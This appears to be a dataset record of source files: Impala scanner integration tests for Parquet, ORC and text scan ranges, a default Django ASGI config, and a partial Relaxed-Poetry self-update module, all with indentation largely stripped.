result = self.client.execute("select int_col from functional_parquet.alltypestiny"
" order by int_col limit 10")
for summary_name in ("ParquetCompressedPageSize", "ParquetUncompressedPageSize"):
page_size_summaries = get_bytes_summary_stats_counter(
summary_name, result.runtime_profile)
assert len(page_size_summaries) > 0
for summary in page_size_summaries:
assert not self._is_summary_stats_counter_empty(summary)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_bytes_read_per_column(self, vector):
"""IMPALA-6964: Test that the counter Parquet[Un]compressedBytesReadPerColumn is
updated when reading [un]compressed Parquet files, and that the counter
Parquet[Un]CompressedBytesReadPerColumn is not updated."""
# lineitem_sixblocks is not compressed so ParquetCompressedBytesReadPerColumn should
# be empty, but ParquetUncompressedBytesReadPerColumn should have been updated
# Query needs an order by so that all rows are read. Only access a couple of
# columns to reduce query runtime.
result = self.client.execute("select l_orderkey, l_partkey "
"from functional_parquet.lineitem_sixblocks "
" order by l_orderkey limit 10")
compressed_bytes_read_per_col_summaries = get_bytes_summary_stats_counter(
"ParquetCompressedBytesReadPerColumn", result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(compressed_bytes_read_per_col_summaries) == 4
for summary in compressed_bytes_read_per_col_summaries:
assert self._is_summary_stats_counter_empty(summary)
uncompressed_bytes_read_per_col_summaries = get_bytes_summary_stats_counter(
"ParquetUncompressedBytesReadPerColumn", result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(uncompressed_bytes_read_per_col_summaries) == 4
for i, summary in enumerate(uncompressed_bytes_read_per_col_summaries):
assert not self._is_summary_stats_counter_empty(summary), summary
      # Two columns are read from lineitem_sixblocks, so there should be 2 samples per
      # instance and 6 in total.
if i == 0:
assert summary.total_num_values == 6
else:
assert summary.total_num_values == 2
# alltypestiny is compressed so both ParquetCompressedBytesReadPerColumn and
# ParquetUncompressedBytesReadPerColumn should have been updated
# Query needs an order by so that all rows are read.
result = self.client.execute("select * from functional_parquet.alltypestiny"
" order by int_col limit 10")
for summary_name in ("ParquetCompressedBytesReadPerColumn",
"ParquetUncompressedBytesReadPerColumn"):
bytes_read_per_col_summaries = get_bytes_summary_stats_counter(summary_name,
result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(bytes_read_per_col_summaries) == 4
for i, summary in enumerate(bytes_read_per_col_summaries):
assert not self._is_summary_stats_counter_empty(summary)
# There are 11 columns in alltypestiny so there should be 11 samples per instance.
if i == 0:
assert summary.total_num_values == 33
else:
assert summary.total_num_values == 11
# We use various scan range lengths to exercise corner cases in the HDFS scanner more
# thoroughly. In particular, it will exercise:
# 1. default scan range
# 2. scan range with no tuple
# 3. tuple that span across multiple scan ranges
# 4. scan range length = 16 for ParseSse() execution path
# 5. scan range fits at least one row
MAX_SCAN_RANGE_LENGTHS = [0, 1, 2, 5, 16, 17, 32, 512]
class TestScanRangeLengths(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('max_scan_range_length', *MAX_SCAN_RANGE_LENGTHS))
# Test doesn't need to be run for non-HDFS table formats.
cls.ImpalaTestMatrix.add_constraint(
lambda v: not v.get_value('table_format').file_format in ('kudu', 'hbase'))
def test_scan_ranges(self, vector):
vector.get_value('exec_option')['max_scan_range_length'] =\
vector.get_value('max_scan_range_length')
self.run_test_case('QueryTest/hdfs-tiny-scan', vector)
# Scan range lengths for TPC-H data sets. Test larger scan range sizes. Random
# variation to the length is added by the test in order to exercise edge cases.
TPCH_SCAN_RANGE_LENGTHS = [128 * 1024, 16 * 1024 * 1024]
class TestTpchScanRangeLengths(ImpalaTestSuite):
"""Exercise different scan range lengths on the larger TPC-H data sets."""
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTpchScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('scan_range_length', *TPCH_SCAN_RANGE_LENGTHS))
def test_tpch_scan_ranges(self, vector):
# Randomly adjust the scan range length to exercise different code paths.
max_scan_range_length = \
int(vector.get_value('scan_range_length') * (random.random() + 0.5))
LOG.info("max_scan_range_length={0}".format(max_scan_range_length))
vector.get_value('exec_option')['max_scan_range_length'] = max_scan_range_length
self.run_test_case('tpch-scan-range-lengths', vector)
@SkipIf.not_s3
class TestParquetScanRangeAssigment(ImpalaTestSuite):
"""Test scan range assignment for Parquet files on S3. Since scan range assignment
cannot be validated in the S3PlannerTest (see IMPALA-8942), validate it here."""
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestParquetScanRangeAssigment, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'parquet')
def test_scan_range_skew(self, vector):
"""Validate that each scanner reads an even number of row groups (e.g. there is no
skew). While scan ranges might be assigned evenly, scanners skip Parquet scan ranges
that do not process a range that overlaps the Parquet row-group midpoint."""
# Run TPC-H Q6, which re-produces the scan range assignment bug described in
# IMPALA-3453.
result = self.execute_query("select sum(l_extendedprice * l_discount) as revenue "
"from tpch_parquet.lineitem where l_shipdate >= '1994-01-01' and "
"l_shipdate < '1995-01-01' and l_discount between 0.05 and 0.07 and "
"l_quantity < 24")
# NumRowGroups tracks the number of row groups actually read, not necessarily the
# number assigned. Assert that each fragment processed exactly one row group.
self.__assert_counter_equals(r'NumRowGroups: (\d+)', 1, result.runtime_profile)
# ScanRangesComplete tracks the number of scan ranges assigned to each fragment.
# Assert that each fragment was assigned exactly one scan range.
self.__assert_counter_equals(r'ScanRangesComplete: (\d+)', 1, result.runtime_profile)
# NumScannersWithNoReads tracks the number of scan ranges that did not trigger any
# reads. In the case of Parquet, this counter would be > 0 if a fragment was assigned
# a scan range that does *not* contain the midpoint of a Parquet row group. Assert
# that this value is always 0.
self.__assert_counter_equals(r'NumScannersWithNoReads: (\d+)', 0,
result.runtime_profile)
def __assert_counter_equals(self, counter_regex, value, runtime_profile):
"""Helper method that asserts that the given counter_regex is in the given
    runtime_profile and that each occurrence of the counter matches the expected value."""
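    # Illustration drawn from the calls above: with counter_regex r'NumRowGroups: (\d+)'
    # and value 1, every NumRowGroups entry found in the profile must equal 1.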
num_row_groups_counters = re.findall(counter_regex, runtime_profile)
assert len(num_row_groups_counters) > 1
for num_row_groups in num_row_groups_counters: assert int(num_row_groups) == value
# More tests for text scanner
# 1. Test file that ends w/o tuple delimiter
# 2. Test file with escape character
class TestTextScanRangeLengths(ImpalaTestSuite):
ESCAPE_TABLE_LIST = ["testescape_16_lf", "testescape_16_crlf",
"testescape_17_lf", "testescape_17_crlf",
"testescape_32_lf", "testescape_32_crlf"]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestTextScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('max_scan_range_length', *MAX_SCAN_RANGE_LENGTHS))
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
def test_text_scanner(self, vector):
vector.get_value('exec_option')['max_scan_range_length'] =\
vector.get_value('max_scan_range_length')
self.execute_query_expect_success(self.client, "drop stats "
"functional.table_no_newline_part")
self.execute_query_expect_success(self.client, "compute stats "
"functional.table_no_newline_part")
self.run_test_case('QueryTest/hdfs-text-scan', vector)
# Test various escape char cases. We have to check the count(*) result against
# the count(col) result because if the scan range is split right after the escape
# char, the escape char has no effect because we cannot scan backwards to the
# previous scan range.
for t in self.ESCAPE_TABLE_LIST:
expected_result = self.client.execute("select count(col) from " + t)
result = self.client.execute("select count(*) from " + t)
assert result.data == expected_result.data
# Tests behavior of split "\r\n" delimiters.
class TestTextSplitDelimiters(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestTextSplitDelimiters, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
def test_text_split_delimiters(self, vector, unique_database):
"""Creates and queries a datafile that exercises interesting edge cases around split
"\r\n" delimiters. The data file contains the following 4-byte scan ranges:
abc\r First scan range, ends with split \r\n
- materializes (abc)
\nde\r Initial delimiter found, scan range ends with split \r\n
- materializes (de)
\nfg\r Initial delimiter found, scan range ends with \r
- materializes (fg),(hij)
hij\r Initial delimiter is \r at end
- materializes (klm)
klm\r Initial delimiter is split \r\n
- materializes nothing
\nno\r Final scan range, initial delimiter found, ends with \r
- materializes (no)
"""
DATA = "abc\r\nde\r\nfg\rhij\rklm\r\nno\r"
max_scan_range_length = 4
expected_result = ['abc', 'de', 'fg', 'hij', 'klm', 'no']
self._create_and_query_test_table(
vector, unique_database, DATA, max_scan_range_length, expected_result)
def test_text_split_across_buffers_delimiter(self, vector, unique_database):
"""Creates and queries a datafile that exercises a split "\r\n" across io buffers (but
within a single scan range). We use a 32MB file and 16MB scan ranges, so there are two
scan ranges of two io buffers each. The first scan range exercises a split delimiter
in the main text parsing algorithm. The second scan range exercises correctly
identifying a split delimiter as the first in a scan range."""
DEFAULT_IO_BUFFER_SIZE = 8 * 1024 * 1024
data = ('a' * (DEFAULT_IO_BUFFER_SIZE - 1) + "\r\n" + # first scan range
'b' * (DEFAULT_IO_BUFFER_SIZE - 3) + "\r\n" +
'a' * (DEFAULT_IO_BUFFER_SIZE - 1) + "\r\n" + # second scan range
'b' * (DEFAULT_IO_BUFFER_SIZE - 1))
assert len(data) == DEFAULT_IO_BUFFER_SIZE * 4
max_scan_range_length = DEFAULT_IO_BUFFER_SIZE * 2
expected_result = data.split("\r\n")
new_vector = deepcopy(vector)
new_vector.get_value('exec_option')['max_row_size'] = 9 * 1024 * 1024
self._create_and_query_test_table(
new_vector, unique_database, data, max_scan_range_length, expected_result)
def _create_and_query_test_table(self, vector, unique_database, data,
max_scan_range_length, expected_result):
TABLE_NAME = "test_text_split_delimiters"
qualified_table_name = "%s.%s" % (unique_database, TABLE_NAME)
location = get_fs_path("/test-warehouse/%s_%s" % (unique_database, TABLE_NAME))
query = "create table %s (s string) location '%s'" % (qualified_table_name, location)
self.client.execute(query)
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.filesystem_client.copy_from_local(f.name, location)
self.client.execute("refresh %s" % qualified_table_name);
vector.get_value('exec_option')['max_scan_range_length'] = max_scan_range_length
query = "select * from %s" % qualified_table_name
result = self.execute_query_expect_success(
self.client, query, vector.get_value('exec_option'))
assert sorted(result.data) == sorted(expected_result)
# Test for IMPALA-1740: Support for skip.header.line.count
class TestTextScanHeader(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
    super(TestTextScanHeader, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec in ['none', 'gzip'])
def test_text_scanner_with_header(self, vector, unique_database):
# Remove to allow .test file to set abort_on_error.
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/hdfs-text-scan-with-header', new_vector,
test_file_vars={'$UNIQUE_DB': unique_database})
def test_dateless_timestamp_text(self, vector, unique_database):
"""Test scanning text files which still includes dateless timestamps."""
tbl_name = "timestamp_text_table"
create_sql = "create table %s.%s (t timestamp) stored as textfile" % (
unique_database, tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, tbl_name,
["/testdata/data/dateless_timestamps.txt"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/dateless_timestamp_text', new_vector, unique_database)
# Missing Coverage: No coverage for truncated files errors or scans.
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
class TestScanTruncatedFiles(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScanTruncatedFiles, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# This test takes about a minute to complete due to the Hive commands that are
# executed. To cut down on runtime, limit the test to exhaustive exploration
# strategy.
# TODO: Test other file formats
if cls.exploration_strategy() == 'exhaustive':
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
else:
cls.ImpalaTestMatrix.add_constraint(lambda v: False)
def test_scan_truncated_file_empty(self, vector, unique_database):
self.scan_truncated_file(0, unique_database)
def test_scan_truncated_file(self, vector, unique_database):
self.scan_truncated_file(10, unique_database)
def scan_truncated_file(self, num_rows, db_name):
fq_tbl_name = db_name + ".truncated_file_test"
self.execute_query("create table %s (s string)" % fq_tbl_name)
self.run_stmt_in_hive("insert overwrite table %s select string_col from "
"functional.alltypes" % fq_tbl_name)
# Update the Impala metadata
self.execute_query("refresh %s" % fq_tbl_name)
# Insert overwrite with a truncated file
self.run_stmt_in_hive("insert overwrite table %s select string_col from "
"functional.alltypes limit %s" % (fq_tbl_name, num_rows))
# The file will not exist if the table is empty and the insert is done by Hive 3, so
# another refresh is needed.
self.execute_query("refresh %s" % fq_tbl_name)
result = self.execute_query("select count(*) from %s" % fq_tbl_name)
assert(len(result.data) == 1)
assert(result.data[0] == str(num_rows))
class TestUncompressedText(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestUncompressedText, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'text' and
v.get_value('table_format').compression_codec == 'none')
# IMPALA-5315: Test support for date/time in unpadded format
def test_scan_lazy_timestamp(self, vector, unique_database):
test_files = ["testdata/data/lazy_timestamp.csv"]
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (ts TIMESTAMP)""",
unique_database, "lazy_ts", test_files)
self.run_test_case('QueryTest/select-lazy-timestamp', vector, unique_database)
class TestOrc(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestOrc, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'orc')
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
def test_misaligned_orc_stripes(self, vector, unique_database):
self._build_lineitem_table_helper(unique_database, 'lineitem_threeblocks',
'lineitem_threeblocks.orc')
self._build_lineitem_table_helper(unique_database, 'lineitem_sixblocks',
'lineitem_sixblocks.orc')
self._build_lineitem_table_helper(unique_database,
'lineitem_orc_multiblock_one_stripe',
'lineitem_orc_multiblock_one_stripe.orc')
# functional_orc.alltypes is well-formatted. 'NumScannersWithNoReads' counters are
# set to 0.
table_name = 'functional_orc_def.alltypes'
self._misaligned_orc_stripes_helper(table_name, 7300)
# lineitem_threeblock.orc is ill-formatted but every scanner reads some stripes.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = unique_database + '.lineitem_threeblocks'
self._misaligned_orc_stripes_helper(table_name, 16000)
# lineitem_sixblocks.orc is ill-formatted but every scanner reads some stripes.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = unique_database + '.lineitem_sixblocks'
self._misaligned_orc_stripes_helper(table_name, 30000)
# Scanning lineitem_orc_multiblock_one_stripe.orc finds two scan ranges that end up
# doing no reads because the file is poorly formatted.
table_name = unique_database + '.lineitem_orc_multiblock_one_stripe'
self._misaligned_orc_stripes_helper(
table_name, 16000, num_scanners_with_no_reads=2)
def _build_lineitem_table_helper(self, db, tbl, file):
self.client.execute("create table %s.%s like tpch.lineitem stored as orc" % (db, tbl))
tbl_loc = get_fs_path("/test-warehouse/%s.db/%s" % (db, tbl))
# set block size to 156672 so lineitem_threeblocks.orc occupies 3 blocks,
# lineitem_sixblocks.orc occupies 6 blocks.
check_call(['hdfs', 'dfs', '-Ddfs.block.size=156672', '-copyFromLocal', '-d', '-f',
os.environ['IMPALA_HOME'] + "/testdata/LineItemMultiBlock/" + file, tbl_loc])
self.client.execute("refresh %s.%s" % (db, tbl))
def _misaligned_orc_stripes_helper(
self, table_name, rows_in_table, num_scanners_with_no_reads=0):
"""Checks if 'num_scanners_with_no_reads' indicates the expected number of scanners
that don't read anything because the underlying file is poorly formatted
"""
query = 'select * from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == rows_in_table
num_scanners_with_no_reads_list = re.findall(
'NumScannersWithNoReads: ([0-9]*)', result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_scanners_with_no_reads_list) == 4
# Calculate the total number of scan ranges that ended up not reading anything because
# an underlying file was poorly formatted.
# Skip the Averaged Fragment; it comes first in the runtime profile.
total = 0
for n in num_scanners_with_no_reads_list[1:]:
total += int(n)
assert total == num_scanners_with_no_reads
# Skip this test on non-HDFS filesystems, because orc-type-check.test contains Hive
# queries that hang in some cases (IMPALA-9345). It would be possible to separate
# the tests that use Hive and run most tests on S3, but I think that running these on
# S3 doesn't add too much coverage.
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfHive3.non_acid
def test_type_conversions_hive2(self, vector, unique_database):
# Create "illtypes" tables whose columns can't match the underlining ORC file's.
# Create an "safetypes" table likes above but ORC columns can still fit into it.
# Reuse the data files of alltypestiny and date_tbl in funtional_orc_def.
tbl_loc = get_fs_path("/test-warehouse/alltypestiny_orc_def")
self.client.execute("""create external table %s.illtypes (c1 boolean, c2 float,
c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string, c9 int,
c10 float, c11 bigint) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.illtypes_ts_to_date (c1 boolean,
c2 float, c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string,
c9 int, c10 float, c11 date) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.safetypes (c1 bigint, c2 boolean,
c3 smallint, c4 int, c5 bigint, c6 bigint, c7 double, c8 double, c9 char(3),
c10 varchar(3), c11 timestamp) partitioned by (year int, month int) stored as ORC
location '%s';""" % (unique_database, tbl_loc))
self.client.execute("""create external table %s.illtypes_date_tbl (c1 boolean,
c2 timestamp) partitioned by (date_part date) stored as ORC location '%s';"""
% (unique_database, "/test-warehouse/date_tbl_orc_def"))
self.client.execute("alter table %s.illtypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_ts_to_date recover partitions"
% unique_database)
self.client.execute("alter table %s.safetypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_date_tbl recover partitions"
% unique_database)
    # Create a decimal table whose precisions don't match the underlying ORC files.
# Reuse the data files of functional_orc_def.decimal_tbl.
decimal_loc = get_fs_path("/test-warehouse/decimal_tbl_orc_def")
self.client.execute("""create external table %s.mismatch_decimals (d1 decimal(8,0),
d2 decimal(8,0), d3 decimal(19,10), d4 decimal(20,20), d5 decimal(2,0))
partitioned by (d6 decimal(9,0)) stored as orc location '%s'"""
% (unique_database, decimal_loc))
self.client.execute("alter table %s.mismatch_decimals recover partitions"
% unique_database)
self.run_test_case('DataErrorsTest/orc-type-checks', vector, unique_database)
# Skip this test on non-HDFS filesystems, because orc-type-check.test contains Hive
# queries that hang in some cases (IMPALA-9345). It would be possible to separate
# the tests that use Hive and run most tests on S3, but I think that running these on
# S3 doesn't add too much coverage.
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
@SkipIfHive2.acid
def test_type_conversions_hive3(self, vector, unique_database):
# Create "illtypes" tables whose columns can't match the underlining ORC file's.
# Create an "safetypes" table likes above but ORC columns can still fit into it.
# Reuse the data files of alltypestiny and date_tbl in funtional_orc_def.
def create_plain_orc_table(fq_tbl_src, fq_tbl_dest):
self.run_stmt_in_hive(
"create table %s like %s stored as orc" % (fq_tbl_dest, fq_tbl_src))
self.run_stmt_in_hive("insert into %s select * from %s" % (fq_tbl_dest, fq_tbl_src))
self.client.execute("invalidate metadata %s" % fq_tbl_dest)
tmp_alltypes = unique_database + ".alltypes"
create_plain_orc_table("functional.alltypestiny", tmp_alltypes)
tbl_loc = self._get_table_location(tmp_alltypes, vector)
self.client.execute("""create table %s.illtypes (c1 boolean, c2 float,
c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string, c9 int,
c10 float, c11 bigint) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
self.client.execute("""create table %s.illtypes_ts_to_date (c1 boolean,
c2 float, c3 boolean, c4 tinyint, c5 smallint, c6 int, c7 boolean, c8 string,
c9 int, c10 float, c11 date) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
self.client.execute("""create table %s.safetypes (c1 bigint, c2 boolean,
c3 smallint, c4 int, c5 bigint, c6 bigint, c7 double, c8 double, c9 char(3),
c10 varchar(3), c11 timestamp) partitioned by (year int, month int) stored as ORC
location '%s'""" % (unique_database, tbl_loc))
tmp_date_tbl = unique_database + ".date_tbl"
create_plain_orc_table("functional.date_tbl", tmp_date_tbl)
date_tbl_loc = self._get_table_location(tmp_date_tbl, vector)
self.client.execute("""create table %s.illtypes_date_tbl (c1 boolean,
c2 timestamp) partitioned by (date_part date) stored as ORC location '%s'"""
% (unique_database, date_tbl_loc))
self.client.execute("alter table %s.illtypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_ts_to_date recover partitions"
% unique_database)
self.client.execute("alter table %s.safetypes recover partitions" % unique_database)
self.client.execute("alter table %s.illtypes_date_tbl recover partitions"
% unique_database)
    # Create a decimal table whose precisions don't match the underlying ORC files.
# Reuse the data files of functional_orc_def.decimal_tbl.
tmp_decimal_tbl = unique_database + ".decimal_tbl"
create_plain_orc_table("functional.decimal_tbl", tmp_decimal_tbl)
decimal_loc = self._get_table_location(tmp_decimal_tbl, vector)
self.client.execute("""create table %s.mismatch_decimals (d1 decimal(8,0),
d2 decimal(8,0), d3 decimal(19,10), d4 decimal(20,20), d5 decimal(2,0))
partitioned by (d6 decimal(9,0)) stored as orc location '%s'"""
% (unique_database, decimal_loc))
self.client.execute("alter table %s.mismatch_decimals recover partitions"
% unique_database)
self.run_test_case('DataErrorsTest/orc-type-checks', vector, unique_database)
def test_orc_timestamp_out_of_range(self, vector, unique_database):
"""Test the validation of out-of-range timestamps."""
test_files = ["testdata/data/out_of_range_timestamp.orc"]
create_table_and_copy_files(self.client, "create table {db}.{tbl} "
"(ts timestamp) stored as orc",
unique_database, "out_of_range_timestamp", test_files)
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('DataErrorsTest/orc-out-of-range-timestamp',
new_vector, unique_database)
def _run_invalid_schema_test(self, unique_database, test_name, expected_error):
"""Copies 'test_name'.orc to a table and runs a simple query. These tests should
cause an error during the processing of the ORC schema, so the file's columns do
not have to match with the table's columns.
"""
test_files = ["testdata/data/%s.orc" % test_name]
create_table_and_copy_files(self.client,
"CREATE TABLE {db}.{tbl} (id BIGINT) STORED AS ORC",
unique_database, test_name, test_files)
err = self.execute_query_expect_failure(self.client,
"select count(*) from {0}.{1}".format(unique_database, test_name))
assert expected_error in str(err)
def test_invalid_schema(self, vector, unique_database):
"""Test scanning of ORC file with malformed schema."""
self._run_invalid_schema_test(unique_database, "corrupt_schema",
"Encountered parse error during schema selection")
self._run_invalid_schema_test(unique_database, "corrupt_root_type",
"Root of the selected type returned by the ORC lib is not STRUCT: boolean.")
def test_date_out_of_range_orc(self, vector, unique_database):
"""Test scanning orc files with an out of range date."""
orc_tbl_name = "out_of_range_date_orc"
create_sql = "create table %s.%s (d date) stored as orc" % (unique_database,
orc_tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, orc_tbl_name,
["/testdata/data/out_of_range_date.orc"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/out-of-range-date-orc', new_vector, unique_database)
def test_pre_gregorian_date_orc(self, vector, unique_database):
"""Test date interoperability issues between Impala and Hive 2.1.1 when scanning
an orc table that contains dates that precede the introduction of Gregorian
calendar in 1582-10-15.
"""
orc_tbl_name = "hive2_pre_gregorian_orc"
create_sql = "create table %s.%s (d date) stored as orc" % (unique_database,
orc_tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, orc_tbl_name,
["/testdata/data/hive2_pre_gregorian.orc"])
self.run_test_case('QueryTest/hive2-pre-gregorian-date-orc', vector, unique_database)
class TestScannerReservation(ImpalaTestSuite):
@classmethod
  def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScannerReservation, cls).add_test_dimensions()
# Only run with a single dimension - all queries are format-specific and
# reference tpch or tpch_parquet directly.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_scanners(self, vector):
self.run_test_case('QueryTest/scanner-reservation', vector)
class TestErasureCoding(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@SkipIf.not_ec
def test_erasure_coding(self, vector):
self.run_test_case('QueryTest/hdfs-erasure-coding', vector)
|
[] |
[] |
[
"IMPALA_HOME"
] |
[]
|
["IMPALA_HOME"]
|
python
| 1 | 0 | |
Chapter-2/test_django_project/test_django_project/asgi.py
|
"""
ASGI config for test_django_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_django_project.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
poetry/app/relaxed_poetry_updater.py
|
import os
import shutil
import site
from pathlib import Path
from typing import TYPE_CHECKING, Optional
from poetry.core.pyproject.project import Project
from poetry.core.utils.props_ext import cached_property
from poetry.console import console
from poetry.console.exceptions import PoetrySimpleConsoleException
from poetry.factory import Factory
from poetry.repositories.installed_repository import InstalledRepository
if TYPE_CHECKING:
from poetry.app.relaxed_poetry import RelaxedPoetry
class RelaxedPoetryUpdater:
def __init__(self, rp: "RelaxedPoetry"):
self._rp = rp
@cached_property
def _installation_env(self):
from poetry.utils.env import EnvManager
return EnvManager.get_system_env(naive=False)
# @cached_property
# def _pool(self) -> Pool:
# pool = Pool()
# pool.add_repository(PyPiRepository())
# return pool
@cached_property
def bin_dir(self) -> Path:
from poetry.utils._compat import WINDOWS
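        # When RP_HOME is set, scripts are placed under $RP_HOME/bin; for example
        # (path assumed for illustration) RP_HOME=/opt/rp yields /opt/rp/bin.
        # Otherwise the per-user bin/Scripts directory reported by site is used.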
if os.getenv("RP_HOME"):
return Path(os.getenv("RP_HOME"), "bin").expanduser()
user_base = site.getuserbase()
if WINDOWS:
bin_dir = os.path.join(user_base, "Scripts")
else:
bin_dir = os.path.join(user_base, "bin")
return Path(bin_dir)
@cached_property
def _installed_repository(self) -> InstalledRepository:
return InstalledRepository.load(self._installation_env)
def is_installed_using_recommended_installer(self) -> bool:
from poetry.utils.env import EnvManager
env = EnvManager.get_system_env(naive=True)
# We can't use is_relative_to() since it's only available in Python 3.9+
try:
env.path.relative_to(self._rp.installation_dir())
return True
except ValueError:
return False
# def _find_update_version(self, version: Optional[str]) -> Optional[Package]:
# if not version:
# version = ">=" + self._rp.version
#
# console.println(f"Attempting to find update version with constraint: {version}")
# repo = self._pool.repositories[0]
# packages = repo.find_packages(
# Dependency("relaxed-poetry", version)
# )
#
# if not packages:
# raise PoetrySimpleConsoleException(f"No release found for version '{version}'")
#
# packages.sort(
# key=cmp_to_key(
# lambda x, y: 0
# if x.version == y.version
# else int(x.version < y.version or -1)
# )
# )
#
# return packages[0] if len(packages) > 0 else None
def update(self, version: Optional[str], dry_run: bool) -> bool:
if not self.is_installed_using_recommended_installer():
raise PoetrySimpleConsoleException(
"Poetry was not installed with the recommended installer, "
"so it cannot be updated automatically."
)
env = self._installation_env
from poetry.__version__ import __version__
pyproject = Project.new_in_mem("rp-installation", "1.0.0")
dependencies = pyproject.dependencies
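        # Depend on relaxed-poetry itself from an in-memory project; with no explicit
        # version requested and a current __version__ of, say, 1.2.3 (value assumed for
        # illustration), the constraint below becomes ">=1.2.3".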
dependencies["relaxed-poetry"] = version or f">={__version__}"
dependencies["python"] = "^3.6"
pt = Factory().create_poetry_for_pyproject(pyproject, env=env)
pt.installer.update(True)
pt.installer.dry_run(dry_run)
pt.installer.run()
# release = self._find_update_version(version)
#
# if release is None:
# console.println("No new release found")
# return False
#
# console.println(f"Updating <c1>Relaxed-Poetry</c1> to <c2>{release.version}</c2>")
# console.println()
#
# self.add_packages(f"relaxed-poetry {release}", dry_run=dry_run)
self._make_bin()
#
# console.println(f"<c1>Relaxed-Poetry</c1> (<c2>{release.version}</c2>) is installed now. Great!")
# console.println()
return True
def _make_bin(self) -> None:
from poetry.utils._compat import WINDOWS
console.println("")
console.println("Updating the <c1>rp</c1> script")
self.bin_dir.mkdir(parents=True, exist_ok=True)
